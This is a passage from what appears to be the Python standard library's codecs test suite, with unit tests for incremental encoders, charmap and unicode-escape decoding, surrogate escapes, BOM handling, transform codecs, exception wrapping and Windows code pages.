self.assertEqual(decodedresult, s,
"encoding=%r" % encoding)
# check iterencode()/iterdecode()
result = "".join(codecs.iterdecode(
codecs.iterencode(s, encoding), encoding))
self.assertEqual(result, s, "encoding=%r" % encoding)
# check iterencode()/iterdecode() with empty string
result = "".join(codecs.iterdecode(
codecs.iterencode("", encoding), encoding))
self.assertEqual(result, "")
if encoding not in ("idna", "mbcs"):
# check incremental decoder/encoder with errors argument
try:
encoder = codecs.getincrementalencoder(encoding)("ignore")
except LookupError: # no IncrementalEncoder
pass
else:
encodedresult = b"".join(encoder.encode(c) for c in s)
decoder = codecs.getincrementaldecoder(encoding)("ignore")
decodedresult = "".join(decoder.decode(bytes([c]))
for c in encodedresult)
self.assertEqual(decodedresult, s,
"encoding=%r" % encoding)
@support.cpython_only
def test_basics_capi(self):
from _testcapi import codec_incrementalencoder, codec_incrementaldecoder
s = "abc123" # all codecs should be able to encode these
for encoding in all_unicode_encodings:
if encoding not in broken_incremental_coders:
# check incremental decoder/encoder (fetched via the C API)
try:
cencoder = codec_incrementalencoder(encoding)
except LookupError: # no IncrementalEncoder
pass
else:
# check C API
encodedresult = b""
for c in s:
encodedresult += cencoder.encode(c)
encodedresult += cencoder.encode("", True)
cdecoder = codec_incrementaldecoder(encoding)
decodedresult = ""
for c in encodedresult:
decodedresult += cdecoder.decode(bytes([c]))
decodedresult += cdecoder.decode(b"", True)
self.assertEqual(decodedresult, s,
"encoding=%r" % encoding)
if encoding not in ("idna", "mbcs"):
# check incremental decoder/encoder with errors argument
try:
cencoder = codec_incrementalencoder(encoding, "ignore")
except LookupError: # no IncrementalEncoder
pass
else:
encodedresult = b"".join(cencoder.encode(c) for c in s)
cdecoder = codec_incrementaldecoder(encoding, "ignore")
decodedresult = "".join(cdecoder.decode(bytes([c]))
for c in encodedresult)
self.assertEqual(decodedresult, s,
"encoding=%r" % encoding)
def test_seek(self):
# all codecs should be able to encode these
s = "%s\n%s\n" % (100*"abc123", 100*"def456")
for encoding in all_unicode_encodings:
if encoding == "idna": # FIXME: See SF bug #1163178
continue
if encoding in broken_unicode_with_streams:
continue
reader = codecs.getreader(encoding)(io.BytesIO(s.encode(encoding)))
for t in range(5):
# Test that calling seek resets the internal codec state and buffers
reader.seek(0, 0)
data = reader.read()
self.assertEqual(s, data)
def test_bad_decode_args(self):
for encoding in all_unicode_encodings:
decoder = codecs.getdecoder(encoding)
self.assertRaises(TypeError, decoder)
if encoding not in ("idna", "punycode"):
self.assertRaises(TypeError, decoder, 42)
def test_bad_encode_args(self):
for encoding in all_unicode_encodings:
encoder = codecs.getencoder(encoding)
with support.check_warnings():
# unicode-internal has been deprecated
self.assertRaises(TypeError, encoder)
def test_encoding_map_type_initialized(self):
from encodings import cp1140
# This used to crash, we are only verifying there's no crash.
table_type = type(cp1140.encoding_table)
self.assertEqual(table_type, table_type)
def test_decoder_state(self):
# Check that getstate() and setstate() handle the state properly
u = "abc123"
for encoding in all_unicode_encodings:
if encoding not in broken_incremental_coders:
self.check_state_handling_decode(encoding, u, u.encode(encoding))
self.check_state_handling_encode(encoding, u, u.encode(encoding))
class CharmapTest(unittest.TestCase):
def test_decode_with_string_map(self):
self.assertEqual(
codecs.charmap_decode(b"\x00\x01\x02", "strict", "abc"),
("abc", 3)
)
self.assertEqual(
codecs.charmap_decode(b"\x00\x01\x02", "strict", "\U0010FFFFbc"),
("\U0010FFFFbc", 3)
)
self.assertRaises(UnicodeDecodeError,
codecs.charmap_decode, b"\x00\x01\x02", "strict", "ab"
)
self.assertRaises(UnicodeDecodeError,
codecs.charmap_decode, b"\x00\x01\x02", "strict", "ab\ufffe"
)
self.assertEqual(
codecs.charmap_decode(b"\x00\x01\x02", "replace", "ab"),
("ab\ufffd", 3)
)
self.assertEqual(
codecs.charmap_decode(b"\x00\x01\x02", "replace", "ab\ufffe"),
("ab\ufffd", 3)
)
self.assertEqual(
codecs.charmap_decode(b"\x00\x01\x02", "ignore", "ab"),
("ab", 3)
)
self.assertEqual(
codecs.charmap_decode(b"\x00\x01\x02", "ignore", "ab\ufffe"),
("ab", 3)
)
allbytes = bytes(range(256))
self.assertEqual(
codecs.charmap_decode(allbytes, "ignore", ""),
("", len(allbytes))
)
def test_decode_with_int2str_map(self):
self.assertEqual(
codecs.charmap_decode(b"\x00\x01\x02", "strict",
{0: 'a', 1: 'b', 2: 'c'}),
("abc", 3)
)
self.assertEqual(
codecs.charmap_decode(b"\x00\x01\x02", "strict",
{0: 'Aa', 1: 'Bb', 2: 'Cc'}),
("AaBbCc", 3)
)
self.assertEqual(
codecs.charmap_decode(b"\x00\x01\x02", "strict",
{0: '\U0010FFFF', 1: 'b', 2: 'c'}),
("\U0010FFFFbc", 3)
)
self.assertEqual(
codecs.charmap_decode(b"\x00\x01\x02", "strict",
{0: 'a', 1: 'b', 2: ''}),
("ab", 3)
)
self.assertRaises(UnicodeDecodeError,
codecs.charmap_decode, b"\x00\x01\x02", "strict",
{0: 'a', 1: 'b'}
)
self.assertRaises(UnicodeDecodeError,
codecs.charmap_decode, b"\x00\x01\x02", "strict",
{0: 'a', 1: 'b', 2: None}
)
# Issue #14850
self.assertRaises(UnicodeDecodeError,
codecs.charmap_decode, b"\x00\x01\x02", "strict",
{0: 'a', 1: 'b', 2: '\ufffe'}
)
self.assertEqual(
codecs.charmap_decode(b"\x00\x01\x02", "replace",
{0: 'a', 1: 'b'}),
("ab\ufffd", 3)
)
self.assertEqual(
codecs.charmap_decode(b"\x00\x01\x02", "replace",
{0: 'a', 1: 'b', 2: None}),
("ab\ufffd", 3)
)
# Issue #14850
self.assertEqual(
codecs.charmap_decode(b"\x00\x01\x02", "replace",
{0: 'a', 1: 'b', 2: '\ufffe'}),
("ab\ufffd", 3)
)
self.assertEqual(
codecs.charmap_decode(b"\x00\x01\x02", "ignore",
{0: 'a', 1: 'b'}),
("ab", 3)
)
self.assertEqual(
codecs.charmap_decode(b"\x00\x01\x02", "ignore",
{0: 'a', 1: 'b', 2: None}),
("ab", 3)
)
# Issue #14850
self.assertEqual(
codecs.charmap_decode(b"\x00\x01\x02", "ignore",
{0: 'a', 1: 'b', 2: '\ufffe'}),
("ab", 3)
)
allbytes = bytes(range(256))
self.assertEqual(
codecs.charmap_decode(allbytes, "ignore", {}),
("", len(allbytes))
)
def test_decode_with_int2int_map(self):
a = ord('a')
b = ord('b')
c = ord('c')
self.assertEqual(
codecs.charmap_decode(b"\x00\x01\x02", "strict",
{0: a, 1: b, 2: c}),
("abc", 3)
)
# Issue #15379
self.assertEqual(
codecs.charmap_decode(b"\x00\x01\x02", "strict",
{0: 0x10FFFF, 1: b, 2: c}),
("\U0010FFFFbc", 3)
)
self.assertEqual(
codecs.charmap_decode(b"\x00\x01\x02", "strict",
{0: sys.maxunicode, 1: b, 2: c}),
(chr(sys.maxunicode) + "bc", 3)
)
self.assertRaises(TypeError,
codecs.charmap_decode, b"\x00\x01\x02", "strict",
{0: sys.maxunicode + 1, 1: b, 2: c}
)
self.assertRaises(UnicodeDecodeError,
codecs.charmap_decode, b"\x00\x01\x02", "strict",
{0: a, 1: b},
)
self.assertRaises(UnicodeDecodeError,
codecs.charmap_decode, b"\x00\x01\x02", "strict",
{0: a, 1: b, 2: 0xFFFE},
)
self.assertEqual(
codecs.charmap_decode(b"\x00\x01\x02", "replace",
{0: a, 1: b}),
("ab\ufffd", 3)
)
self.assertEqual(
codecs.charmap_decode(b"\x00\x01\x02", "replace",
{0: a, 1: b, 2: 0xFFFE}),
("ab\ufffd", 3)
)
self.assertEqual(
codecs.charmap_decode(b"\x00\x01\x02", "ignore",
{0: a, 1: b}),
("ab", 3)
)
self.assertEqual(
codecs.charmap_decode(b"\x00\x01\x02", "ignore",
{0: a, 1: b, 2: 0xFFFE}),
("ab", 3)
)
class WithStmtTest(unittest.TestCase):
def test_encodedfile(self):
f = io.BytesIO(b"\xc3\xbc")
with codecs.EncodedFile(f, "latin-1", "utf-8") as ef:
self.assertEqual(ef.read(), b"\xfc")
def test_streamreaderwriter(self):
f = io.BytesIO(b"\xc3\xbc")
info = codecs.lookup("utf-8")
with codecs.StreamReaderWriter(f, info.streamreader,
info.streamwriter, 'strict') as srw:
self.assertEqual(srw.read(), "\xfc")
class TypesTest(unittest.TestCase):
def test_decode_unicode(self):
# Most decoders don't accept unicode input
decoders = [
codecs.utf_7_decode,
codecs.utf_8_decode,
codecs.utf_16_le_decode,
codecs.utf_16_be_decode,
codecs.utf_16_ex_decode,
codecs.utf_32_decode,
codecs.utf_32_le_decode,
codecs.utf_32_be_decode,
codecs.utf_32_ex_decode,
codecs.latin_1_decode,
codecs.ascii_decode,
codecs.charmap_decode,
]
if hasattr(codecs, "mbcs_decode"):
decoders.append(codecs.mbcs_decode)
for decoder in decoders:
self.assertRaises(TypeError, decoder, "xxx")
def test_unicode_escape(self):
# Escape-decoding an unicode string is supported ang gives the same
# result as decoding the equivalent ASCII bytes string.
self.assertEqual(codecs.unicode_escape_decode(r"\u1234"), ("\u1234", 6))
self.assertEqual(codecs.unicode_escape_decode(br"\u1234"), ("\u1234", 6))
self.assertEqual(codecs.raw_unicode_escape_decode(r"\u1234"), ("\u1234", 6))
self.assertEqual(codecs.raw_unicode_escape_decode(br"\u1234"), ("\u1234", 6))
self.assertRaises(UnicodeDecodeError, codecs.unicode_escape_decode, br"\U00110000")
self.assertEqual(codecs.unicode_escape_decode(r"\U00110000", "replace"), ("\ufffd", 10))
self.assertRaises(UnicodeDecodeError, codecs.raw_unicode_escape_decode, br"\U00110000")
self.assertEqual(codecs.raw_unicode_escape_decode(r"\U00110000", "replace"), ("\ufffd", 10))
class UnicodeEscapeTest(unittest.TestCase):
def test_empty(self):
self.assertEqual(codecs.unicode_escape_encode(""), (b"", 0))
self.assertEqual(codecs.unicode_escape_decode(b""), ("", 0))
def test_raw_encode(self):
encode = codecs.unicode_escape_encode
for b in range(32, 127):
if b != b'\\'[0]:
self.assertEqual(encode(chr(b)), (bytes([b]), 1))
def test_raw_decode(self):
decode = codecs.unicode_escape_decode
for b in range(256):
if b != b'\\'[0]:
self.assertEqual(decode(bytes([b]) + b'0'), (chr(b) + '0', 2))
def test_escape_encode(self):
encode = codecs.unicode_escape_encode
check = coding_checker(self, encode)
check('\t', br'\t')
check('\n', br'\n')
check('\r', br'\r')
check('\\', br'\\')
for b in range(32):
if chr(b) not in '\t\n\r':
check(chr(b), ('\\x%02x' % b).encode())
for b in range(127, 256):
check(chr(b), ('\\x%02x' % b).encode())
check('\u20ac', br'\u20ac')
check('\U0001d120', br'\U0001d120')
def test_escape_decode(self):
decode = codecs.unicode_escape_decode
check = coding_checker(self, decode)
check(b"[\\\n]", "[]")
check(br'[\"]', '["]')
check(br"[\']", "[']")
check(br"[\\]", r"[\]")
check(br"[\a]", "[\x07]")
check(br"[\b]", "[\x08]")
check(br"[\t]", "[\x09]")
check(br"[\n]", "[\x0a]")
check(br"[\v]", "[\x0b]")
check(br"[\f]", "[\x0c]")
check(br"[\r]", "[\x0d]")
check(br"[\7]", "[\x07]")
check(br"[\8]", r"[\8]")
check(br"[\78]", "[\x078]")
check(br"[\41]", "[!]")
check(br"[\418]", "[!8]")
check(br"[\101]", "[A]")
check(br"[\1010]", "[A0]")
check(br"[\x41]", "[A]")
check(br"[\x410]", "[A0]")
check(br"\u20ac", "\u20ac")
check(br"\U0001d120", "\U0001d120")
for b in range(256):
if b not in b'\n"\'\\abtnvfr01234567xuUN':
check(b'\\' + bytes([b]), '\\' + chr(b))
def test_decode_errors(self):
decode = codecs.unicode_escape_decode
for c, d in (b'x', 2), (b'u', 4), (b'U', 4):
for i in range(d):
self.assertRaises(UnicodeDecodeError, decode,
b"\\" + c + b"0"*i)
self.assertRaises(UnicodeDecodeError, decode,
b"[\\" + c + b"0"*i + b"]")
data = b"[\\" + c + b"0"*i + b"]\\" + c + b"0"*i
self.assertEqual(decode(data, "ignore"), ("[]", len(data)))
self.assertEqual(decode(data, "replace"),
("[\ufffd]\ufffd", len(data)))
self.assertRaises(UnicodeDecodeError, decode, br"\U00110000")
self.assertEqual(decode(br"\U00110000", "ignore"), ("", 10))
self.assertEqual(decode(br"\U00110000", "replace"), ("\ufffd", 10))
class RawUnicodeEscapeTest(unittest.TestCase):
def test_empty(self):
self.assertEqual(codecs.raw_unicode_escape_encode(""), (b"", 0))
self.assertEqual(codecs.raw_unicode_escape_decode(b""), ("", 0))
def test_raw_encode(self):
encode = codecs.raw_unicode_escape_encode
for b in range(256):
self.assertEqual(encode(chr(b)), (bytes([b]), 1))
def test_raw_decode(self):
decode = codecs.raw_unicode_escape_decode
for b in range(256):
self.assertEqual(decode(bytes([b]) + b'0'), (chr(b) + '0', 2))
def test_escape_encode(self):
encode = codecs.raw_unicode_escape_encode
check = coding_checker(self, encode)
for b in range(256):
if b not in b'uU':
check('\\' + chr(b), b'\\' + bytes([b]))
check('\u20ac', br'\u20ac')
check('\U0001d120', br'\U0001d120')
def test_escape_decode(self):
decode = codecs.raw_unicode_escape_decode
check = coding_checker(self, decode)
for b in range(256):
if b not in b'uU':
check(b'\\' + bytes([b]), '\\' + chr(b))
check(br"\u20ac", "\u20ac")
check(br"\U0001d120", "\U0001d120")
def test_decode_errors(self):
decode = codecs.raw_unicode_escape_decode
for c, d in (b'u', 4), (b'U', 4):
for i in range(d):
self.assertRaises(UnicodeDecodeError, decode,
b"\\" + c + b"0"*i)
self.assertRaises(UnicodeDecodeError, decode,
b"[\\" + c + b"0"*i + b"]")
data = b"[\\" + c + b"0"*i + b"]\\" + c + b"0"*i
self.assertEqual(decode(data, "ignore"), ("[]", len(data)))
self.assertEqual(decode(data, "replace"),
("[\ufffd]\ufffd", len(data)))
self.assertRaises(UnicodeDecodeError, decode, br"\U00110000")
self.assertEqual(decode(br"\U00110000", "ignore"), ("", 10))
self.assertEqual(decode(br"\U00110000", "replace"), ("\ufffd", 10))
class SurrogateEscapeTest(unittest.TestCase):
def test_utf8(self):
# Bad byte
self.assertEqual(b"foo\x80bar".decode("utf-8", "surrogateescape"),
"foo\udc80bar")
self.assertEqual("foo\udc80bar".encode("utf-8", "surrogateescape"),
b"foo\x80bar")
# bad-utf-8 encoded surrogate
self.assertEqual(b"\xed\xb0\x80".decode("utf-8", "surrogateescape"),
"\udced\udcb0\udc80")
self.assertEqual("\udced\udcb0\udc80".encode("utf-8", "surrogateescape"),
b"\xed\xb0\x80")
def test_ascii(self):
# bad byte
self.assertEqual(b"foo\x80bar".decode("ascii", "surrogateescape"),
"foo\udc80bar")
self.assertEqual("foo\udc80bar".encode("ascii", "surrogateescape"),
b"foo\x80bar")
def test_charmap(self):
# bad byte: \xa5 is unmapped in iso-8859-3
self.assertEqual(b"foo\xa5bar".decode("iso-8859-3", "surrogateescape"),
"foo\udca5bar")
self.assertEqual("foo\udca5bar".encode("iso-8859-3", "surrogateescape"),
b"foo\xa5bar")
def test_latin1(self):
# Issue6373
self.assertEqual("\udce4\udceb\udcef\udcf6\udcfc".encode("latin-1", "surrogateescape"),
b"\xe4\xeb\xef\xf6\xfc")
class BomTest(unittest.TestCase):
def test_seek0(self):
data = "1234567890"
tests = ("utf-16",
"utf-16-le",
"utf-16-be",
"utf-32",
"utf-32-le",
"utf-32-be")
self.addCleanup(support.unlink, support.TESTFN)
for encoding in tests:
# Check if the BOM is written only once
with codecs.open(support.TESTFN, 'w+', encoding=encoding) as f:
f.write(data)
f.write(data)
f.seek(0)
self.assertEqual(f.read(), data * 2)
f.seek(0)
self.assertEqual(f.read(), data * 2)
# Check that the BOM is written after a seek(0)
with codecs.open(support.TESTFN, 'w+', encoding=encoding) as f:
f.write(data[0])
self.assertNotEqual(f.tell(), 0)
f.seek(0)
f.write(data)
f.seek(0)
self.assertEqual(f.read(), data)
# (StreamWriter) Check that the BOM is written after a seek(0)
with codecs.open(support.TESTFN, 'w+', encoding=encoding) as f:
f.writer.write(data[0])
self.assertNotEqual(f.writer.tell(), 0)
f.writer.seek(0)
f.writer.write(data)
f.seek(0)
self.assertEqual(f.read(), data)
# Check that the BOM is not written after a seek() at a position
# different than the start
with codecs.open(support.TESTFN, 'w+', encoding=encoding) as f:
f.write(data)
f.seek(f.tell())
f.write(data)
f.seek(0)
self.assertEqual(f.read(), data * 2)
# (StreamWriter) Check that the BOM is not written after a seek()
# at a position different than the start
with codecs.open(support.TESTFN, 'w+', encoding=encoding) as f:
f.writer.write(data)
f.writer.seek(f.writer.tell())
f.writer.write(data)
f.seek(0)
self.assertEqual(f.read(), data * 2)
bytes_transform_encodings = [
"base64_codec",
"uu_codec",
"quopri_codec",
"hex_codec",
]
transform_aliases = {
"base64_codec": ["base64", "base_64"],
"uu_codec": ["uu"],
"quopri_codec": ["quopri", "quoted_printable", "quotedprintable"],
"hex_codec": ["hex"],
"rot_13": ["rot13"],
}
try:
import zlib
except ImportError:
zlib = None
else:
bytes_transform_encodings.append("zlib_codec")
transform_aliases["zlib_codec"] = ["zip", "zlib"]
try:
import bz2
except ImportError:
pass
else:
bytes_transform_encodings.append("bz2_codec")
transform_aliases["bz2_codec"] = ["bz2"]
class TransformCodecTest(unittest.TestCase):
def test_basics(self):
binput = bytes(range(256))
for encoding in bytes_transform_encodings:
with self.subTest(encoding=encoding):
# generic codecs interface
(o, size) = codecs.getencoder(encoding)(binput)
self.assertEqual(size, len(binput))
(i, size) = codecs.getdecoder(encoding)(o)
self.assertEqual(size, len(o))
self.assertEqual(i, binput)
def test_read(self):
for encoding in bytes_transform_encodings:
with self.subTest(encoding=encoding):
sin = codecs.encode(b"\x80", encoding)
reader = codecs.getreader(encoding)(io.BytesIO(sin))
sout = reader.read()
self.assertEqual(sout, b"\x80")
def test_readline(self):
for encoding in bytes_transform_encodings:
with self.subTest(encoding=encoding):
sin = codecs.encode(b"\x80", encoding)
reader = codecs.getreader(encoding)(io.BytesIO(sin))
sout = reader.readline()
self.assertEqual(sout, b"\x80")
def test_buffer_api_usage(self):
# We check all the transform codecs accept memoryview input
# for encoding and decoding
# and also that they roundtrip correctly
original = b"12345\x80"
for encoding in bytes_transform_encodings:
with self.subTest(encoding=encoding):
data = original
view = memoryview(data)
data = codecs.encode(data, encoding)
view_encoded = codecs.encode(view, encoding)
self.assertEqual(view_encoded, data)
view = memoryview(data)
data = codecs.decode(data, encoding)
self.assertEqual(data, original)
view_decoded = codecs.decode(view, encoding)
self.assertEqual(view_decoded, data)
def test_text_to_binary_blacklists_binary_transforms(self):
# Check binary -> binary codecs give a good error for str input
bad_input = "bad input type"
for encoding in bytes_transform_encodings:
with self.subTest(encoding=encoding):
fmt = ( "{!r} is not a text encoding; "
"use codecs.encode\(\) to handle arbitrary codecs")
msg = fmt.format(encoding)
with self.assertRaisesRegex(LookupError, msg) as failure:
bad_input.encode(encoding)
self.assertIsNone(failure.exception.__cause__)
def test_text_to_binary_blacklists_text_transforms(self):
# Check str.encode gives a good error message for str -> str codecs
msg = (r"^'rot_13' is not a text encoding; "
"use codecs.encode\(\) to handle arbitrary codecs")
with self.assertRaisesRegex(LookupError, msg):
"just an example message".encode("rot_13")
def test_binary_to_text_blacklists_binary_transforms(self):
# Check bytes.decode and bytearray.decode give a good error
# message for binary -> binary codecs
data = b"encode first to ensure we meet any format restrictions"
for encoding in bytes_transform_encodings:
with self.subTest(encoding=encoding):
encoded_data = codecs.encode(data, encoding)
fmt = (r"{!r} is not a text encoding; "
"use codecs.decode\(\) to handle arbitrary codecs")
msg = fmt.format(encoding)
with self.assertRaisesRegex(LookupError, msg):
encoded_data.decode(encoding)
with self.assertRaisesRegex(LookupError, msg):
bytearray(encoded_data).decode(encoding)
def test_binary_to_text_blacklists_text_transforms(self):
# Check str -> str codec gives a good error for binary input
for bad_input in (b"immutable", bytearray(b"mutable")):
with self.subTest(bad_input=bad_input):
msg = (r"^'rot_13' is not a text encoding; "
"use codecs.decode\(\) to handle arbitrary codecs")
with self.assertRaisesRegex(LookupError, msg) as failure:
bad_input.decode("rot_13")
self.assertIsNone(failure.exception.__cause__)
@unittest.skipUnless(zlib, "Requires zlib support")
def test_custom_zlib_error_is_wrapped(self):
# Check zlib codec gives a good error for malformed input
msg = "^decoding with 'zlib_codec' codec failed"
with self.assertRaisesRegex(Exception, msg) as failure:
codecs.decode(b"hello", "zlib_codec")
self.assertIsInstance(failure.exception.__cause__,
type(failure.exception))
def test_custom_hex_error_is_wrapped(self):
# Check hex codec gives a good error for malformed input
msg = "^decoding with 'hex_codec' codec failed"
with self.assertRaisesRegex(Exception, msg) as failure:
codecs.decode(b"hello", "hex_codec")
self.assertIsInstance(failure.exception.__cause__,
type(failure.exception))
# Unfortunately, the bz2 module throws OSError, which the codec
# machinery currently can't wrap :(
# Ensure codec aliases from http://bugs.python.org/issue7475 work
def test_aliases(self):
for codec_name, aliases in transform_aliases.items():
expected_name = codecs.lookup(codec_name).name
for alias in aliases:
with self.subTest(alias=alias):
info = codecs.lookup(alias)
self.assertEqual(info.name, expected_name)
# The codec system tries to wrap exceptions in order to ensure the error
# mentions the operation being performed and the codec involved. We
# currently *only* want this to happen for relatively stateless
# exceptions, where the only significant information they contain is their
# type and a single str argument.
# Use a local codec registry to avoid appearing to leak objects when
# registering multiple seach functions
_TEST_CODECS = {}
def _get_test_codec(codec_name):
return _TEST_CODECS.get(codec_name)
codecs.register(_get_test_codec) # Returns None, not usable as a decorator
try:
# Issue #22166: Also need to clear the internal cache in CPython
from _codecs import _forget_codec
except ImportError:
def _forget_codec(codec_name):
pass
class ExceptionChainingTest(unittest.TestCase):
def setUp(self):
# There's no way to unregister a codec search function, so we just
# ensure we render this one fairly harmless after the test
# case finishes by using the test case repr as the codec name
# The codecs module normalizes codec names, although this doesn't
# appear to be formally documented...
# We also make sure we use a truly unique id for the custom codec
# to avoid issues with the codec cache when running these tests
# multiple times (e.g. when hunting for refleaks)
unique_id = repr(self) + str(id(self))
self.codec_name = encodings.normalize_encoding(unique_id).lower()
# We store the object to raise on the instance because of a bad
# interaction between the codec caching (which means we can't
# recreate the codec entry) and regrtest refleak hunting (which
# runs the same test instance multiple times). This means we
# need to ensure the codecs call back in to the instance to find
# out which exception to raise rather than binding them in a
# closure to an object that may change on the next run
self.obj_to_raise = RuntimeError
def tearDown(self):
_TEST_CODECS.pop(self.codec_name, None)
# Issue #22166: Also pop from caches to avoid appearance of ref leaks
encodings._cache.pop(self.codec_name, None)
try:
_forget_codec(self.codec_name)
except KeyError:
pass
def set_codec(self, encode, decode):
codec_info = codecs.CodecInfo(encode, decode,
name=self.codec_name)
_TEST_CODECS[self.codec_name] = codec_info
@contextlib.contextmanager
def assertWrapped(self, operation, exc_type, msg):
full_msg = r"{} with {!r} codec failed \({}: {}\)".format(
operation, self.codec_name, exc_type.__name__, msg)
with self.assertRaisesRegex(exc_type, full_msg) as caught:
yield caught
self.assertIsInstance(caught.exception.__cause__, exc_type)
self.assertIsNotNone(caught.exception.__cause__.__traceback__)
def raise_obj(self, *args, **kwds):
# Helper to dynamically change the object raised by a test codec
raise self.obj_to_raise
def check_wrapped(self, obj_to_raise, msg, exc_type=RuntimeError):
self.obj_to_raise = obj_to_raise
self.set_codec(self.raise_obj, self.raise_obj)
with self.assertWrapped("encoding", exc_type, msg):
"str_input".encode(self.codec_name)
with self.assertWrapped("encoding", exc_type, msg):
codecs.encode("str_input", self.codec_name)
with self.assertWrapped("decoding", exc_type, msg):
b"bytes input".decode(self.codec_name)
with self.assertWrapped("decoding", exc_type, msg):
codecs.decode(b"bytes input", self.codec_name)
def test_raise_by_type(self):
self.check_wrapped(RuntimeError, "")
def test_raise_by_value(self):
msg = "This should be wrapped"
self.check_wrapped(RuntimeError(msg), msg)
def test_raise_grandchild_subclass_exact_size(self):
msg = "This should be wrapped"
class MyRuntimeError(RuntimeError):
__slots__ = ()
self.check_wrapped(MyRuntimeError(msg), msg, MyRuntimeError)
def test_raise_subclass_with_weakref_support(self):
msg = "This should be wrapped"
class MyRuntimeError(RuntimeError):
pass
self.check_wrapped(MyRuntimeError(msg), msg, MyRuntimeError)
def check_not_wrapped(self, obj_to_raise, msg):
def raise_obj(*args, **kwds):
raise obj_to_raise
self.set_codec(raise_obj, raise_obj)
with self.assertRaisesRegex(RuntimeError, msg):
"str input".encode(self.codec_name)
with self.assertRaisesRegex(RuntimeError, msg):
codecs.encode("str input", self.codec_name)
with self.assertRaisesRegex(RuntimeError, msg):
b"bytes input".decode(self.codec_name)
with self.assertRaisesRegex(RuntimeError, msg):
codecs.decode(b"bytes input", self.codec_name)
def test_init_override_is_not_wrapped(self):
class CustomInit(RuntimeError):
def __init__(self):
pass
self.check_not_wrapped(CustomInit, "")
def test_new_override_is_not_wrapped(self):
class CustomNew(RuntimeError):
def __new__(cls):
return super().__new__(cls)
self.check_not_wrapped(CustomNew, "")
def test_instance_attribute_is_not_wrapped(self):
msg = "This should NOT be wrapped"
exc = RuntimeError(msg)
exc.attr = 1
self.check_not_wrapped(exc, "^{}$".format(msg))
def test_non_str_arg_is_not_wrapped(self):
self.check_not_wrapped(RuntimeError(1), "1")
def test_multiple_args_is_not_wrapped(self):
msg_re = r"^\('a', 'b', 'c'\)$"
self.check_not_wrapped(RuntimeError('a', 'b', 'c'), msg_re)
# http://bugs.python.org/issue19609
def test_codec_lookup_failure_not_wrapped(self):
msg = "^unknown encoding: {}$".format(self.codec_name)
# The initial codec lookup should not be wrapped
with self.assertRaisesRegex(LookupError, msg):
"str input".encode(self.codec_name)
with self.assertRaisesRegex(LookupError, msg):
codecs.encode("str input", self.codec_name)
with self.assertRaisesRegex(LookupError, msg):
b"bytes input".decode(self.codec_name)
with self.assertRaisesRegex(LookupError, msg):
codecs.decode(b"bytes input", self.codec_name)
def test_unflagged_non_text_codec_handling(self):
# The stdlib non-text codecs are now marked so they're
# pre-emptively skipped by the text model related methods
# However, third party codecs won't be flagged, so we still make
# sure the case where an inappropriate output type is produced is
# handled appropriately
def encode_to_str(*args, **kwds):
return "not bytes!", 0
def decode_to_bytes(*args, **kwds):
return b"not str!", 0
self.set_codec(encode_to_str, decode_to_bytes)
# No input or output type checks on the codecs module functions
encoded = codecs.encode(None, self.codec_name)
self.assertEqual(encoded, "not bytes!")
decoded = codecs.decode(None, self.codec_name)
self.assertEqual(decoded, b"not str!")
# Text model methods should complain
fmt = (r"^{!r} encoder returned 'str' instead of 'bytes'; "
"use codecs.encode\(\) to encode to arbitrary types$")
msg = fmt.format(self.codec_name)
with self.assertRaisesRegex(TypeError, msg):
"str_input".encode(self.codec_name)
fmt = (r"^{!r} decoder returned 'bytes' instead of 'str'; "
"use codecs.decode\(\) to decode to arbitrary types$")
msg = fmt.format(self.codec_name)
with self.assertRaisesRegex(TypeError, msg):
b"bytes input".decode(self.codec_name)
@unittest.skipUnless(sys.platform == 'win32',
'code pages are specific to Windows')
class CodePageTest(unittest.TestCase):
# CP_UTF8 is already tested by CP65001Test
CP_UTF8 = 65001
def test_invalid_code_page(self):
self.assertRaises(ValueError, codecs.code_page_encode, -1, 'a')
self.assertRaises(ValueError, codecs.code_page_decode, -1, b'a')
self.assertRaises(OSError, codecs.code_page_encode, 123, 'a')
self.assertRaises(OSError, codecs.code_page_decode, 123, b'a')
def test_code_page_name(self):
self.assertRaisesRegex(UnicodeEncodeError, 'cp932',
codecs.code_page_encode, 932, '\xff')
self.assertRaisesRegex(UnicodeDecodeError, 'cp932',
codecs.code_page_decode, 932, b'\x81\x00')
self.assertRaisesRegex(UnicodeDecodeError, 'CP_UTF8',
codecs.code_page_decode, self.CP_UTF8, b'\xff')
def check_decode(self, cp, tests):
for raw, errors, expected in tests:
if expected is not None:
try:
decoded = codecs.code_page_decode(cp, raw, errors)
except UnicodeDecodeError as err:
self.fail('Unable to decode %a from "cp%s" with '
'errors=%r: %s' % (raw, cp, errors, err))
self.assertEqual(decoded[0], expected,
'%a.decode("cp%s", %r)=%a != %a'
% (raw, cp, errors, decoded[0], expected))
# assert 0 <= decoded[1] <= len(raw)
self.assertGreaterEqual(decoded[1], 0)
self.assertLessEqual(decoded[1], len(raw))
else:
self.assertRaises(UnicodeDecodeError,
codecs.code_page_decode, cp, raw, errors)
def check_encode(self, cp, tests):
for text, errors, expected in tests:
if expected is not None:
try:
encoded = codecs.code_page_encode(cp, text, errors)
except UnicodeEncodeError as err:
self.fail('Unable to encode %a to "cp%s" with '
'errors=%r: %s' % (text, cp, errors, err))
self.assertEqual(encoded[0], expected,
'%a.encode("cp%s", %r)=%a != %a'
% (text, cp, errors, encoded[0], expected))
self.assertEqual(encoded[1], len(text))
else:
self.assertRaises(UnicodeEncodeError,
codecs.code_page_encode, cp, text, errors)
def test_cp932(self):
self.check_encode(932, (
('abc', 'strict', b'abc'),
('\uff44\u9a3e', 'strict', b'\x82\x84\xe9\x80'),
# test error handlers
('\xff', 'strict', None),
('[\xff]', 'ignore', b'[]'),
('[\xff]', 'replace', b'[y]'),
('[\u20ac]', 'replace', b'[?]'),
('[\xff]', 'backslashreplace', b'[\\xff]'),
('[\xff]', 'xmlcharrefreplace', b'[ÿ]'),
))
self.check_decode(932, (
(b'abc', 'strict', 'abc'),
(b'\x82\x84\xe9\x80', 'strict', '\uff44\u9a3e'),
# invalid bytes
(b'[\xff]', 'strict', None),
(b'[\xff]', 'ignore', '[]'),
(b'[\xff]', 'replace', '[\ufffd]'),
(b'[\xff]', 'surrogateescape', '[\udcff]'),
(b'\x81\x00abc', 'strict', None),
(b'\x81\x00abc', 'ignore', '\x00abc'),
(b'\x81\x00abc', 'replace', '\ufffd\x00abc'),
))
def test_cp1252(self):
self.check_encode(1252, (
('abc', 'strict', b'abc'),
('\xe9\u20ac', 'strict', b'\xe9\x80'),
('\xff', 'strict', b'\xff'),
('\u0141', 'strict', None),
('\u0141', 'ignore', b''),
('\u0141', 'replace', b'L'),
))
